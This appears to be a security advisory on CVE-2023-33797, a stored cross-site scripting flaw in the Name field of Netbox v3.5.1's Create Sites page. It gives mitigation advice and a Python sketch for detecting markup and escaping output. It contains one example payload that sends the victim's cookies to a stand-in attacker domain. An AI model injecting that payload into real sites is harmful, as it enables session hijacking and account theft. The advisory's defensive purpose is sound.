A stored cross-site scripting (XSS) vulnerability has been identified in the Create Sites (/dcim/sites/) function of Netbox v3.5.1. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the Name field. This vulnerability has been assigned the CVE identifier CVE-2023-33797.
Netbox is a popular open-source tool for managing IP address spaces, data center infrastructure, and networks. The Create Sites function in v3.5.1 allows administrators to create and manage various sites for their infrastructure. Unfortunately, this function is susceptible to a stored XSS vulnerability, which can be exploited by attackers to manipulate the web interface and potentially gain unauthorized access to sensitive information and features.
How the exploit works
One example of a potentially malicious payload is as follows:
<script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker-domain.com/steal?cookie=' + encodeURIComponent(document.cookie)); xhr.send(); </script>
When this snippet is injected into the Name field, it attempts to send the user's cookies, including their session cookie, to the attacker's domain. If successful, this could allow an attacker to hijack the user's session and perform unauthorized actions in the Netbox interface.
This vulnerability has been reported on the Netbox GitHub repository.
Mitigation and solution
The developers of Netbox have been notified of this vulnerability, and a patch has been released in version 3.5.2 to address the issue. It is strongly recommended that users update to the latest version of Netbox immediately to mitigate this vulnerability. If updating is not possible, users should refrain from utilizing the Create Sites function or restrict access to trusted users only.
Further recommendations include implementing proper input validation and sanitization for the Name field to prevent the injection of malicious code. Additionally, administrators should train users to recognize potential XSS vulnerabilities and avoid clicking on untrusted links or downloading suspicious files.
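The validation and encoding recommended above can be sketched as follows. This is an added example, not Netbox's own code and not the fix shipped in 3.5.2: it audits stored site names for markup and output-encodes a name before rendering. The record shape (`id`, `name`), the function names and the sample values are assumptions constructed for illustration.

```python
import html
from html.parser import HTMLParser


class MarkupFinder(HTMLParser):
    """Records every tag and script-bearing attribute found in a string."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self.findings.append(f"<{tag}> tag")
        for attr, value in attrs:
            if attr.startswith("on"):
                self.findings.append(f"event handler attribute {attr}")
            elif value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {attr}")


def find_markup(value):
    """Return the reasons a stored value would be parsed as HTML, if any."""
    finder = MarkupFinder()
    finder.feed(value)
    finder.close()
    return finder.findings


def audit_site_names(sites):
    """Map site id -> findings for each site whose name contains markup."""
    flagged = {}
    for site in sites:
        findings = find_markup(site["name"])
        if findings:
            flagged[site["id"]] = findings
    return flagged


def render_name(name):
    """Output-encode a name for an HTML text or attribute context."""
    return html.escape(name, quote=True)


# Constructed sample records; ids and names are hypothetical.
SAMPLE_SITES = [
    {"id": 1, "name": "Frankfurt DC-2 (R&D) < 10 racks"},
    {"id": 2, "name": "<script>/* marker */</script>"},
    {"id": 3, "name": "<img src=x onerror=void(0)>"},
]
```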
The CVE-2023-33797 vulnerability is a serious issue that can lead to unauthorized access and potential data breaches in the Netbox platform. It is crucial for administrators to update their systems and implement security best practices to mitigate this stored XSS vulnerability. By staying informed about emerging security threats and implementing proactive measures, organizations can better protect their IT infrastructure and sensitive data.
Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC